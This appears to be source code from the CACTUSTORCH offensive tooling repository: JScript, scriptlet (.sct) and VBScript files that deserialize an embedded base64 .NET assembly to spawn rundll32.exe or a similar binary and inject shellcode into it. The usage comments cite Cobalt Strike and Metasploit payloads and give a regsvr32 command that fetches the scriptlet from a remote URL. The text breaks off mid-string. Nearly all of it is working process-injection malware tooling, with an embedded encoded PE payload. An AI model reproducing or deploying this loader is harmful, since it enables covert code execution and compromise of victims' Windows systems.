"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 82 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 83 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA"+ 84 | "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ 85 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA"+ 86 | "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 87 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 88 | "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+ 89 | "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+ 90 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA"+ 91 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+ 92 | "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+ 93 | "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+ 94 | "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR"+ 95 | "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA"+ 96 | "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR"+ 97 | "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V"+ 98 | "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA"+ 99 | "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu"+ 100 | "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR"+ 101 | "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA"+ 102 | "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA"+ 103 | "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh"+ 104 | "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA"+ 105 | "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9"+ 106 | "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA"+ 107 | "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/"+ 108 | "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA"+ 109 | "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED"+ 110 | "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA"+ 111 | "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH"+ 112 | "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA"+ 113 | "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/"+ 114 | "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG"+ 115 | "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS"+ 116 | "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA"+ 117 | "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA"+ 118 | "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH"+ 119 | "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD"+ 120 | "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I"+ 121 | "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF"+ 122 | "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA"+ 123 | "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+"+ 124 | "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA"+ 125 | "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE"+ 126 | "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A"+ 127 | "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ"+ 128 | "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA"+ 129 | "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw"+ 130 | "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB"+ 131 | "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz"+ 132 | "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA"+ 133 | "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA"+ 134 | "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy"+ 135 | "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP"+ 136 | "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V"+ 137 | "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD"+ 138 | "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV"+ 139 | "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW"+ 140 | "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf"+ 141 | "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf"+ 142 | "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT"+ 143 | "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM"+ 144 | "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X"+ 145 | "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU"+ 146 | "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV"+ 147 | "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG"+ 148 | "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT"+ 149 | "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS"+ 150 | "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi"+ 151 | "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU"+ 152 | "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl"+ 153 | "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA"+ 154 | "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl"+ 155 | "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli"+ 156 | "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp"+ 157 | "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs"+ 158 | "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv"+ 159 | "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0"+ 160 | "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp"+ 161 | "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp"+ 162 | "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG"+ 163 | "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr"+ 164 | "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy"+ 165 | "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj"+ 166 | "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk"+ 167 | "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj"+ 168 | "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT"+ 169 | "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz"+ 170 | "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD"+ 171 | "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA"+ 172 | "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB"+ 173 | "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj"+ 174 | "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0"+ 175 | "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl"+ 176 | "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0"+ 177 | "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP"+ 178 | "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB"+ 179 | "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O"+ 180 | "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA"+ 181 | "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA"+ 182 | "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA"+ 183 | "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC"+ 184 | "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY"+ 185 | "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB"+ 186 | "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm"+ 187 | "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA"+ 188 | "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg"+ 189 | "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+ 190 | "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+ 191 | "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+ 192 | "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+ 193 | "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+ 194 | "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+ 195 | "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+ 196 | "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+ 197 | "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+ 198 | "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+ 199 | "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+ 200 | "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+ 201 | "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+ 202 | "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+ 203 | "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+ 204 | "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+ 205 | "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 206 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 207 | "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 208 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 209 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 210 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 211 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 212 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 213 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 214 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 215 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 216 | "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+ 217 | "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; 218 | var entry_class = 'cactusTorch'; 219 | 220 | try { 221 | setversion(); 222 | var stm = base64ToStream(serialized_obj); 223 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 224 | var al = new ActiveXObject('System.Collections.ArrayList'); 225 | var n = fmt.SurrogateSelector; 226 | var d = fmt.Deserialize_2(stm); 227 | al.Add(n); 228 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 229 | o.flame(binary,code); 230 | } catch (e) { 231 | debug(e.message); 232 | } -------------------------------------------------------------------------------- /CACTUSTORCH.sct: -------------------------------------------------------------------------------- 1 | /* 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | Author: Vincent Yiu (@vysecurity) 12 | Credits: 13 | - @cn33liz: Inspiration with StarFighter 14 | - @ttiraniddo: James Forshaw for DotNet2JScript 15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 16 | 17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 18 | 19 | Usage: 20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | Run: cat payload.bin | base64 -w 0 23 | Copy the base64 encoded payload into the code variable below. 24 | 25 | Execute: regsvr32 /s /n /u /i:http://domain.com/cactustorch.sct scrobj.dll 26 | 27 | */ 28 | 29 | 30 | 31 | 33 | 38 | 248 | 249 | 250 | -------------------------------------------------------------------------------- /CACTUSTORCH.vbe: -------------------------------------------------------------------------------- 1 | ' ( ) ( ) 2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 9 | ' 10 | ' Author: Vincent Yiu (@vysecurity) 11 | ' Credits: 12 | ' - @cn33liz: Inspiration with StarFighter 13 | ' - @ttiraniddo: James Forshaw for DotNet2JScript 14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 15 | 16 | ' A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 17 | 18 | ' Usage: 19 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 20 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 21 | ' Run: cat payload.bin | base64 -w 0 22 | ' Copy the base64 encoded payload into the code variable below. 23 | 24 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 25 | Dim binary : binary = "rundll32.exe" 26 | 27 | ' Base64 encoded 32 bit shellcode 28 | Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA" 29 | 30 | ' ---------- DO NOT EDIT BELOW HERE ----------- 31 | 32 | Sub Debug(s) 33 | End Sub 34 | Sub SetVersion 35 | Dim shell 36 | Set shell = CreateObject("WScript.Shell") 37 | Dim ver 38 | ver = "v4.0.30319" 39 | On Error Resume Next 40 | shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\" 41 | If Err.Number <> 0 Then 42 | ver = "v2.0.50727" 43 | Err.Clear 44 | End If 45 | shell.Environment("Process").Item("COMPLUS_Version") = ver 46 | End Sub 47 | Function Base64ToStream(b) 48 | Dim enc, length, ba, transform, ms 49 | Set enc = CreateObject("System.Text.ASCIIEncoding") 50 | length = enc.GetByteCount_2(b) 51 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform") 52 | Set ms = CreateObject("System.IO.MemoryStream") 53 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 54 | ms.Position = 0 55 | Set Base64ToStream = ms 56 | End Function 57 | 58 | Sub Run 59 | Dim s, entry_class 60 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" 61 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" 62 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" 63 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" 64 | s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" 65 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" 66 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" 67 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" 68 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu" 69 | s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH" 70 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA" 71 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw" 72 | s = s & 